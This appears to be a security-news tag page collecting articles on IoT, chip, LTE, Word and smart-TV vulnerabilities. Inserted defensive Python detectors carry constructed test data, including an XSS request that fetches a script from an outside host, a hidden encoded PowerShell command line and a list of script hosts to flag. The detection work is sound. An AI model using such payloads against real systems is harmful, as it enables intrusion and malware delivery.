flaw


Ring Flaw Underscores Impact of IoT Vulnerabilities

Source: National Cyber Security – Produced By Gregory Evans

A vulnerability in Amazon’s Ring doorbell cameras would have allowed a local attacker to gain access to a target’s entire wireless network.

A vulnerability in Amazon’s Ring Video Doorbell Pro IoT device could have allowed a nearby attacker to imitate a disconnected device and then sniff the credentials of the wireless networks when the owner reconfigured the device, according to a report issued by security firm Bitdefender.

The issue, which was fixed by Amazon in September, underscores the impact of a single insecure Internet-of-Things device on the organization in which it is deployed. While the vulnerability may only occur in a single network device, the result of the flaw could be leaked information, the wireless network password for example, which would have far more serious repercussions.

“IoT is a security disaster, any way you look at it,” says Alexandru Balan, Bitdefender’s chief security researcher. “Security is not the strong suit of IoT vendors. Only rarely do we see vendors who take security seriously.”

The discovery of a serious vulnerability in a popular IoT product comes as businesses and consumers increasingly worry about the impact that such devices may have on their own security. Only about half of security teams have a response plan in place to deal with attacks on connected devices, according to a recent report from Neustar. Even critical-infrastructure firms, such as utilities that have to deal with connected operational technology, a widespread class of Internet-of-Things devices, are ill-prepared to deal with vulnerabilities and attacks, the report says.

Vulnerabilities in IoT devices can have serious repercussions. In July, a team of researchers found widespread flaws in the networking software deployed in as many as 200 million embedded devices and found millions more that could be impacted by a variant of the issue in other real-time operating systems.

The issue with Amazon Ring is not as serious, but it is a reminder that vulnerabilities can still be easily found in such devices by attackers paying attention, says Balan. “We tend to look at the popular devices, and those tend to have better security than the less popular devices.”

The rest of the Ring device’s communications are encrypted and secure, according to Bitdefender. The mobile application only communicates with the device through the cloud, even if the app and device are already on the same network, the company’s analysis stated. Cloud communications are conducted over encrypted connections to API services using Transport Layer Security (TLS) and certificate pinning.

The device’s initial connection with the local network is the only time that it sends data without encryption, Balan says. “This is a proximity-based attack, so it’s not that big of a threat on a global scale. You need to be within a hundred meters or so to issue the deauthentication packets and force the user to reset the password.”
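The attack Balan describes starts with forged 802.11 deauthentication frames. The following detector is an added example, not code from Bitdefender or Ring: it parses raw management-frame headers and flags a transmitter that sends an unusual number of deauth frames to one receiver. The frames it runs on are constructed in the block (locally administered MACs, no radiotap header), and the threshold of five frames is an assumed tuning value.

```python
import struct
from collections import Counter

# 802.11 frame-control byte 0: bits 0-1 protocol version, bits 2-3 type, bits 4-7 subtype.
MGMT_TYPE = 0
BEACON_SUBTYPE = 0x8
DEAUTH_SUBTYPE = 0xC


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype, dst, src, bssid, body=b""):
    """Build a minimal 802.11 management frame (constructed test data, no radiotap header)."""
    fc = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])
    duration = b"\x3a\x01"
    seq_ctl = b"\x00\x00"
    return fc + duration + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + seq_ctl + body


def parse_mgmt_header(frame):
    """Return (type, subtype, addr1=receiver, addr2=transmitter, addr3=BSSID), or None if too short."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    return ftype, subtype, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])


def find_deauth_floods(frames, threshold=5):
    """Count deauthentication frames per (transmitter, receiver); return pairs at or above threshold."""
    counts = Counter()
    for frame in frames:
        parsed = parse_mgmt_header(frame)
        if parsed is None:
            continue
        ftype, subtype, receiver, transmitter, _bssid = parsed
        if ftype == MGMT_TYPE and subtype == DEAUTH_SUBTYPE:
            counts[(transmitter, receiver)] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


# Constructed capture: an access point, the doorbell and a second client. Not real devices.
AP = "02:00:00:00:aa:01"
DOORBELL = "02:00:00:00:bb:02"
LAPTOP = "02:00:00:00:cc:03"
BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3 = struct.pack("<H", 7)  # reason code 7: class 3 frame from non-associated station

SAMPLE_FRAMES = (
    [build_mgmt_frame(BEACON_SUBTYPE, BROADCAST, AP, AP)] * 3
    # the attacker forges the AP's address as transmitter and hammers the doorbell
    + [build_mgmt_frame(DEAUTH_SUBTYPE, DOORBELL, AP, AP, REASON_CLASS3)] * 20
    # one genuine deauth from the AP to another client stays below the threshold
    + [build_mgmt_frame(DEAUTH_SUBTYPE, LAPTOP, AP, AP, REASON_CLASS3)]
)

if __name__ == "__main__":
    for (src, dst), n in find_deauth_floods(SAMPLE_FRAMES).items():
        print(f"deauth flood: {src} -> {dst} ({n} frames)")
```

In practice the frames come from a monitor-mode interface. Because the forged frames carry the access point's own MAC as transmitter, the addresses alone cannot distinguish them from a genuine disconnect, which is why the check is rate-based. The protocol-level fix is 802.11w protected management frames, which authenticate deauthentication frames so they cannot be spoofed.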

The existence of the vulnerability is not an indicator of the commitment of Ring’s security team, Balan adds, noting that within a few days Amazon responded and two months later closed out the report. By September, the company issued a patch, within three months of the initial communication, according to Bitdefender’s disclosure timeline. As of November, all affected devices had been patched, which Balan says is a better outcome than the majority of disclosures that Bitdefender works on with other IoT vendors.

“Amazon is one of the few that take security seriously,” he says. “Inherently everything has some flaw that will be discovered. The only challenge with IoT is whether you take that disclosure seriously.”

The trend that more vulnerabilities are being discovered in popular products is a sign that the manufacturers are paying attention and responding to researchers, Balan observes. “If someone does not have vulnerabilities disclosed in their product, then that is likely the most risky product, from a security perspective. If the vulnerabilities were discovered, then props to them — that’s a good thing.”


Intel asks customers to halt patching for chip bug, citing flaw


Intel Corp (INTC.O) said on Monday that patches it released to address two high-profile security vulnerabilities in its chips are faulty, advising customers, computer makers and cloud providers to stop installing them.

Intel Executive Vice President Navin Shenoy disclosed the problem in a statement on the chipmaker’s website, saying that patches released after months of development caused computers to reboot more often than normal and other “unpredictable” behavior. 

“I apologize for any disruption this change in guidance may cause,” Shenoy said. “I assure you we are working around the clock to ensure we are addressing these issues.”

The issue of the faulty patches is separate from complaints by customers for weeks that the patches slow computer performance. Intel has said a typical home and business PC user should not see significant slowdowns.

Intel’s failure to provide a usable patch could cause businesses to postpone purchasing new computers, said IDC analyst Mario Morales.

Intel is ”still trying to get a handle on what’s really happening. They haven’t resolved the matter,” he said.

Intel asked technology providers to start testing a new version of the patches, which it began distributing on Saturday.

The warning came nearly three weeks after Intel confirmed on Jan. 3 that its chips were impacted by vulnerabilities known as Spectre and Meltdown, which make data on affected computers vulnerable to espionage.

Meltdown was specific to chips from Intel, as well as one from SoftBank Group Corp’s (9984.T) ARM Holdings. Spectre affected nearly every modern computing device, including ones with chips from Intel, ARM and Advanced Micro Devices Inc (AMD.O).

Problems with the patches have been growing since Intel on Jan. 11 said they were causing higher reboot rates in its older chips and then last week that the problem was affecting newer processors.


Hackers exploit old flaw to turn Linux servers into cryptocurrency miners

The malicious actors who installed and ran a cryptocurrency mining operation on hacked Tesla AWS servers and Jenkins servers are now targeting servers running Linux and have so far generated more than $74,000 in Monero.

The new campaign uses the legitimate, open-source XMRig cryptominer in conjunction with exploiting the old vulnerability CVE-2013-2618, which is found in Cacti’s Network Weathermap plug-in, according to a Trend Micro Cyber Safety Solutions Team report. The vulnerability is a cross-site scripting vulnerability in editor.php in Network Weathermap before 0.97b and allows remote attackers to inject arbitrary web script or HTML via the map_title parameter.

The campaign is active and primarily affects Japan, Taiwan, China, the U.S., and India.

“As to why they’re exploiting an old security flaw: Network Weathermap only has two publicly reported vulnerabilities so far, both from June 2014. It’s possible these attackers are taking advantage not only of a security flaw for which an exploit is readily available but also of patch lag that occurs in organizations that use the open-source tool,” the team wrote.

Trend Micro was able to trace the activity back to two usernames associated with two Monero wallets where $74,677 has been deposited as of March 21.
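Because the report pins the entry point to the map_title parameter of Network Weathermap’s editor.php, a web-log sweep for that request shape is the first check a defender would run. The detector below is an added example, not Trend Micro’s or Cacti’s code: it parses Apache combined-format lines, percent-decodes the map_title value (repeatedly, so double-encoded payloads are caught) and flags any value that carries markup. The log lines are constructed for the example; the plugin path under /cacti/plugins/weathermap/ is an assumption about a typical install.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Markup that has no business in a map title: a tag opener or a javascript: URL.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-zA-Z!]|javascript\s*:', re.IGNORECASE)

# Constructed sample lines (not from the report): one exploit attempt, one legitimate edit,
# one unrelated Cacti request.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Mar/2018:10:01:12 +0000] "GET /cacti/plugins/weathermap/editor.php?plug=0&mapname=test.conf&action=set_map_properties&map_title=%3Cscript%3Efetch(%27http://203.0.113.7/x.sh%27)%3C/script%3E HTTP/1.1" 200 512 "-" "python-requests/2.18"
198.51.100.2 - - [21/Mar/2018:10:02:30 +0000] "GET /cacti/plugins/weathermap/editor.php?plug=0&mapname=core.conf&action=set_map_properties&map_title=Core+Network HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Mar/2018:10:03:01 +0000] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def fully_decode(value, rounds=3):
    """Percent-decode until stable so %253Cscript%253E (double-encoded) still becomes <script>."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_weathermap_xss(log_text):
    """Return one finding per request that carries markup in Weathermap's map_title parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        path = parts.path.lower()
        if not (path.endswith("/editor.php") and "weathermap" in path):
            continue
        # parse_qs already decodes one layer; fully_decode strips any extra layers.
        for raw_title in parse_qs(parts.query).get("map_title", []):
            title = fully_decode(raw_title)
            if MARKUP_RE.search(title):
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": m.group("status"),
                    "map_title": title,
                })
    return findings


if __name__ == "__main__":
    for hit in find_weathermap_xss(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} map_title={hit["map_title"]!r}')
```

A 200 response to the flagged request is worth treating as a possible compromise rather than a blocked probe, since the editor accepted the value; follow up by checking the host for the XMRig binary and unexpected outbound connections to mining pools.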


Mobile networks investigate flaw that leaves 4G customers open to hacking


Security researchers have discovered a set of severe vulnerabilities in the 4G LTE protocol that could be exploited to spy on user phone calls and text messages, send fake emergency alerts, spoof the location of a device and even knock devices entirely offline.
A new research paper recently published by researchers at Purdue University and the University of Iowa details 10 new cyber attacks against the 4G LTE wireless data communications technology for mobile devices and data terminals.
The attacks exploit design weaknesses in three key protocol procedures of the 4G LTE network known as attach, detach, and paging.

Unlike much previous research, these aren’t just theoretical attacks. The researchers employed a systematic model-based adversarial testing approach, which they called LTEInspector, and were able to test 8 of the 10 attacks in a real testbed using SIM cards from four large US carriers.

Authentication Synchronization Failure Attack
Traceability Attack
Numb Attack
Authentication Relay Attack
Detach/Downgrade Attack
Paging Channel Hijacking Attack
Stealthy Kicking-off Attack
Panic Attack
Energy Depletion Attack
Linkability Attack

Among the above-listed attacks, the researchers consider the authentication relay attack particularly worrying, as it lets an attacker connect to a 4G LTE network by impersonating a victim’s phone number without any legitimate credentials.

This attack could not only allow a hacker to compromise the cellular network to read incoming and outgoing messages of the victims but also frame someone else for the crime.


White House increases transparency around cybersecurity flaw disclosure

Dive Brief: The White House released the charter for the Vulnerabilities Equities Process (VEP), an interagency operation assessing whether the federal government should disclose cyber vulnerabilities it finds to vendors of a technology or whether it should “restrict” the finding in light of national security or law […]

A deep flaw in your car lets hackers shut down safety features


Since two security researchers showed they could hijack a moving Jeep on a highway three years ago, both automakers and the cybersecurity industry have accepted that connected cars are as vulnerable to hacking as anything else linked to the internet. But one new car-hacking trick illustrates that while awareness helps,…


Hackers plunder bank accounts via SS7 TFA flaw – risk known ‘for years’


According to reports by the German newspaper Süddeutsche Zeitung, the telco said that some of its customers had money taken out of their bank accounts using a two-part attack that exploits vulnerabilities in the Signalling System 7 (SS7) protocol. This is a protocol that allows telecoms companies to send text messages from one network to another. It also allows users to make …


Iran-linked hackers used Microsoft Word flaw against Israeli targets, security firm says


Hackers allegedly linked to the Iranian government launched a digital espionage operation this month against more than 250 different Israel-based targets by using a recently disclosed and widely exploited Microsoft Word vulnerability, cybersecurity experts tell CyberScoop.

The hacking group, dubbed OilRig by security researchers and believed to be tied to Iranian intelligence services, exploited a flaw in Word officially known as CVE-2017-0199 that allows an attacker to remotely break into and take full control of a target device while leaving little or no trace, said Michael Gorelik, vice president of Israeli security firm Morphisec.

Over the last month, Morphisec has investigated the incident on behalf of multiple victims. Clients showed forensic evidence on their respective networks that could be linked back to OilRig. After its disclosure in March, CVE-2017-0199 was quickly exploited by nation-states and cybercriminals alike.

John Hultquist, Director of Cyber Espionage Analysis at iSIGHT Partners, confirmed Morphisec’s findings.

“We have recently seen these actors and [other] cyber espionage actors targeting Asia adopt CVE-2017-0199. The vulnerability was a proliferation issue before it was patched, and remains one now,” said Hultquist.

OilRig has been around since at least 2015, according to numerous security industry experts who have watched the group target Israeli networks repeatedly and with varying tactics.

To exploit the Microsoft Word vulnerability, a target must open or preview an infected Microsoft Office or WordPad file, which OilRig sent out in large numbers to hundreds of Israel-based targets, including government agencies and officials. When opened, the attachment designed by OilRig would download the Hancitor trojan, a variant of fileless malware capable of bypassing most security and anti-virus protections.

CVE-2017-0199 was patched earlier this month by Microsoft after an extraordinary nine-month delay from when it was initially communicated to the company privately. Getting the vast ecosystem of Microsoft users to patch machines is a slow and unreliable process, however, so many often remain vulnerable after a patch is published.

Point of initial contact

“The OilRig campaign is a multi-stage kill chain meant to burrow into Israeli critical defense infrastructure,” said Tom Kellermann, CEO of D.C.-based venture capital firm Strategic Cyber Ventures. Kellermann is a major investor in TrapX, another cybersecurity firm that also detected and helped clients defend against the Iranian cyberattack.

The beginnings of the Iranian operation are believed to have started with a series of phishing emails sent to Ben Gurion University employees although it quickly expanded to include various Israeli technology and medical companies. Ben Gurion University is home to Israel’s Cyber Security Research Center, a scientific institute that develops sophisticated cyber capabilities.

Gorelik said an investigation is ongoing to better understand the full scope of damage caused by the hackers. His firm, Morphisec, posted technical analysis of the attack on Thursday morning.

Investigators were able to identify a series of command and control servers activated by the hackers on April 16, which were subsequently used to launch the offensive cyber operation, according to a notification published Wednesday by Israel’s Computer Emergency Response Team. The first round of phishing emails were sent on April 19 and the last came on April 24. The malware-laden emails carried subject lines relating to nonexistent “resumes, exams and holiday plans,” said Gorelik.

Exploiting CVE-2017-0199 enables an attacker to download and execute a Visual Basic script containing PowerShell commands whenever a vulnerable user opens a document containing an embedded exploit, according to American cybersecurity firm FireEye. Malware payloads executed after the exploit can come from all manner of malware families.

FireEye previously found that various hackers — including both governments and cybercriminals — were using the same CVE-2017-0199 vulnerability to breach a wide array of different victims.

On April 11, researchers at FireEye described an attack exploiting CVE-2017-0199 this way:

A threat actor emails a Microsoft Word document to a targeted user with an embedded OLE2 link object
When the user opens the document, winword.exe issues an HTTP request to a remote server to retrieve a malicious HTA file
The file returned by the server is a fake RTF file with an embedded malicious script
Winword.exe looks up the file handler for application/hta through a COM object, which causes the Microsoft HTA application (mshta.exe) to load and execute the malicious script

“This kind of vulnerability is very rare,” Gorelik said. “There has been progress from this group. This is one of the more advanced fileless campaigns I’ve seen. It was a targeted, large campaign using quite a big infrastructure. It’s fileless, so it’s very hard to detect. They regenerated signatures on the endpoint each and every time for the trojan so it’s very hard to remediate, identify or remove it.”

He added, “this Iranian group is quite advanced I would say.”
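The FireEye chain above (winword.exe fetching over HTTP, then mshta.exe running the script, then a PowerShell payload) leaves a process tree that endpoint telemetry can catch even when no malicious file lands on disk. The detector below is an added example, not FireEye’s, Morphisec’s or Microsoft’s code: it reconstructs parent chains from Sysmon-style process-creation events and flags any script host that descends from an Office application, plus any Office process making a plain-HTTP connection. The events are constructed for the example; Sysmon field names (Image, ParentImage, ProcessId, DestinationPort) are real, every value in them is invented, and the port-80-only network rule is an assumed tuning choice.

```python
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "wordpad.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe", "rundll32.exe"}

# Constructed Sysmon-style events: EventID 1 = process create, EventID 3 = network connect.
# Paths, PIDs, addresses and the encoded command line are all invented sample data.
OFFICE_PATH = r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 1000, "Image": OFFICE_PATH,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\resume.doc"'},
    {"EventID": 3, "ProcessId": 4100, "Image": OFFICE_PATH,
     "DestinationIp": "203.0.113.50", "DestinationPort": 80},
    {"EventID": 1, "ProcessId": 4212, "ParentProcessId": 4100,
     "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": OFFICE_PATH,
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Users\alice\AppData\Local\Temp\template.hta"'},
    {"EventID": 1, "ProcessId": 4300, "ParentProcessId": 4212,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    # benign: an administrator launching an HTA from Explorer, no Office ancestor
    {"EventID": 1, "ProcessId": 5000, "ParentProcessId": 1000,
     "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\tools\dashboard.hta"},
]


def basename(path):
    return ntpath.basename(path).lower()


def build_process_table(events):
    """Map ProcessId -> process-create event so parent chains can be walked."""
    return {e["ProcessId"]: e for e in events if e["EventID"] == 1}


def ancestry(pid, table, limit=16):
    """Yield image basenames from the process itself up through its recorded ancestors."""
    hops = 0
    while pid in table and hops < limit:
        event = table[pid]
        yield basename(event["Image"])
        pid = event["ParentProcessId"]
        hops += 1


def detect_office_exploit_chain(events):
    """Flag script hosts descended from Office and Office processes talking plain HTTP."""
    table = build_process_table(events)
    alerts = []
    for e in events:
        if e["EventID"] == 1 and basename(e["Image"]) in SCRIPT_HOSTS:
            chain = list(ancestry(e["ProcessId"], table))
            # chain[0] is the process itself; look for Office anywhere above it
            if any(name in OFFICE_APPS for name in chain[1:]):
                alerts.append({"rule": "office-descendant-script-host",
                               "pid": e["ProcessId"],
                               "chain": " <- ".join(chain),
                               "cmd": e["CommandLine"]})
        elif e["EventID"] == 3 and basename(e["Image"]) in OFFICE_APPS:
            if e.get("DestinationPort") == 80:
                alerts.append({"rule": "office-plain-http",
                               "pid": e["ProcessId"],
                               "dest": f'{e["DestinationIp"]}:{e["DestinationPort"]}'})
    return alerts


if __name__ == "__main__":
    for alert in detect_office_exploit_chain(SAMPLE_EVENTS):
        print(alert)
```

Walking the full ancestry rather than checking only the immediate parent is what catches the PowerShell stage, whose parent is mshta.exe and not Word. Real telemetry needs a process GUID rather than a PID to avoid confusing reused PIDs; the PID is used here only to keep the sample small.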

The Iran-backed espionage campaign was first revealed in broad terms Wednesday through a vague press announcement issued by the Prime Minister’s Office, claiming that Israel’s newly formed Cyber Defense Authority helped to thwart the attack.

The attacks were “relatively well planned and took considerable resources. It is obvious that there was intelligence gathering prior to the attack and a careful selection of targets — in this case Israeli computing companies,” said Boaz Dolev, CEO of the Israeli security firm ClearSky in an interview with the Israeli newspaper Haaretz.


Samsung Smart TV flaw leaves devices open to hackers


Your Samsung Smart TV might be pretty dumb.

Penetration testing firm Neseso has found that a 32-inch Tizen-based smart TV, first released as part of the 2015 model year and still being sold in North America, isn’t authenticating devices that connect to it via Wi-Fi Direct.

Rather than requiring a password or PIN to authenticate devices that want to connect to the TV – like, say, your smartphone when you want to use it as a remote control – it’s relying on a whitelist of devices that the user’s already authorized.

To do that, Samsung’s Smart TV uses devices’ media access control (MAC) addresses. Those are like a digital fingerprint: a MAC address is constant to a piece of hardware (though it can be spoofed, either for legitimate purposes or by a thief who wants to hide it).

Neseso says a user will be notified about a whitelist device that connects to their Smart TV, but that’s it: if the device is on a whitelist, the TV will just lay out the welcome mat without requiring any authentication.

It’s easy for an attacker to get a whitelisted MAC address, Neseso said. In fact, a few years ago, we saw a US cop sniffing out stolen gadgets by MAC addresses, wardriving in his squad car with some software he rigged up to a thumb-drive-sized antenna that plugs into the car’s USB port and looking for MAC addresses that matched those listed in a database of known stolen devices.

After an attacker spoofs a known MAC address, they’d be able to access all the services on the Smart TV, such as remote control service.

An attacker would have to know, ahead of time, the MAC address of, say, your smartphone’s Wi-Fi chip. They’ll also likely have to crouch outside in your shrubbery – given that Wi-Fi Direct doesn’t work over long distances – while clutching their laptop or smartphone to spoof that MAC address and start messing with channel-changing or screen mirroring.
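The point of Neseso’s finding is that a MAC address identifies a device but does not authenticate it. The following is an added example, not Samsung’s or Neseso’s code, and the TV-side logic is a simplified model rather than Tizen’s implementation: the first class reproduces the whitelist policy described above, where a spoofed MAC is accepted outright; the second binds a per-device key during a PIN-based pairing step and then requires a fresh HMAC challenge-response on every connection, so an attacker who has only learned the owner’s MAC is refused. The PIN, MACs and key sizes are assumptions for the example.

```python
import hashlib
import hmac
import secrets


class MacWhitelistPairing:
    """Weak policy as described above: a peer is trusted if its MAC address is on the list."""

    def __init__(self):
        self.allowed = set()

    def authorize(self, mac):
        self.allowed.add(mac.lower())

    def accept(self, mac, _proof=None):
        # Nothing here is secret; anyone who has seen the owner's MAC can present it.
        return mac.lower() in self.allowed


class PairedKeyPairing:
    """Hardened variant: a PIN-gated pairing step issues a per-device secret, and each later
    connection must answer a fresh random challenge with an HMAC over that secret."""

    def __init__(self, pin):
        self.pin = pin
        self.keys = {}  # mac -> 32-byte pairing key

    def pair(self, mac, pin_entered):
        """Run once per device while the owner reads the PIN off the screen; returns the key."""
        if not hmac.compare_digest(pin_entered, self.pin):
            return None
        key = secrets.token_bytes(32)
        self.keys[mac.lower()] = key
        return key

    def challenge(self):
        """A fresh nonce per connection attempt, so a captured proof cannot be replayed."""
        return secrets.token_bytes(16)

    def accept(self, mac, nonce, proof):
        key = self.keys.get(mac.lower())
        if key is None:
            return False
        expected = hmac.new(key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, proof)


def client_proof(key, nonce):
    """What a paired remote-control app computes when the TV challenges it."""
    return hmac.new(key, nonce, hashlib.sha256).digest()


def demo():
    """Return (spoofer accepted by whitelist, owner accepted by hardened TV, spoofer accepted by hardened TV)."""
    owner_mac = "a4:5e:60:11:22:33"  # assumed owner phone MAC

    weak_tv = MacWhitelistPairing()
    weak_tv.authorize(owner_mac)
    spoofer_on_weak = weak_tv.accept(owner_mac)  # attacker presents the copied MAC

    tv = PairedKeyPairing(pin="4821")
    owner_key = tv.pair(owner_mac, "4821")
    nonce = tv.challenge()
    owner_ok = tv.accept(owner_mac, nonce, client_proof(owner_key, nonce))

    nonce = tv.challenge()
    spoofer_on_hardened = tv.accept(owner_mac, nonce, client_proof(b"no pairing key", nonce))
    return spoofer_on_weak, owner_ok, spoofer_on_hardened


if __name__ == "__main__":
    print(demo())
```

Wi-Fi Direct itself already offers WPS PIN or push-button pairing; the weakness the page describes is that the TV skipped any such secret and treated the address as the credential. The per-connection nonce matters as much as the key: without it, an attacker who sniffed one valid proof could replay it from the spoofed MAC.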

OK, so an attacker can change your channel. Annoying, but hardly earth-shattering, eh? Well, it doesn’t stop with the remote exploitation of channel-surfing. An attacker could use it as a springboard to gain access to whatever network the Smart TV is connected to, Neseso said.

Would an attacker be able to get at your home Wi-Fi network’s name and password? Not necessarily through this Wi-Fi Direct vulnerability. But as another security researcher revealed a few weeks ago, the operating system running on millions of Samsung products – it’s called Tizen – is what Motherboard referred to as a hacker’s dream.

Israeli researcher Amihai Neiderman:

Everything you can do wrong there, they do it. You can see that nobody with any understanding of security looked at this code or wrote it. It’s like taking an undergraduate and letting him program your software.

We’ve certainly heard of Samsung vulnerabilities before. In fact, last month, WikiLeaks published documents that purportedly showed how the CIA can monitor people through their Samsung Smart TVs.

Neseso contacted Samsung starting last month, with the Korean company eventually saying that it didn’t consider the find to be a security vulnerability. That’s why Neseso decided to publish details about it on Full Disclosure, it said.

The security outfit advised Samsung Smart TV owners to remove all their whitelisted devices and to avoid using the WiFi-Direct feature. It didn’t explain precisely how to do that, instead telling users to directly contact Samsung. You might want to poke around in the Network menu under Settings or simply disable Wi-Fi on your smart TV… though that would rob you of all those smart TV features you paid for.

Neseso didn’t test other Samsung models, but it suggested that they too might be vulnerable.

Short of disabling Wi-Fi, we’d suggest keeping an eye out for rustling shrubbery. If your TV channels start changing, call the police and then, by all means, switch off your TV’s Wi-Fi.


Hackers exploited Word flaw for months while Microsoft investigated

To understand why it is so difficult to defend computers from even moderately capable hackers, consider the case of the security flaw officially known as CVE-2017-0199. The bug was unusually dangerous but of a common genre: it was in Microsoft …
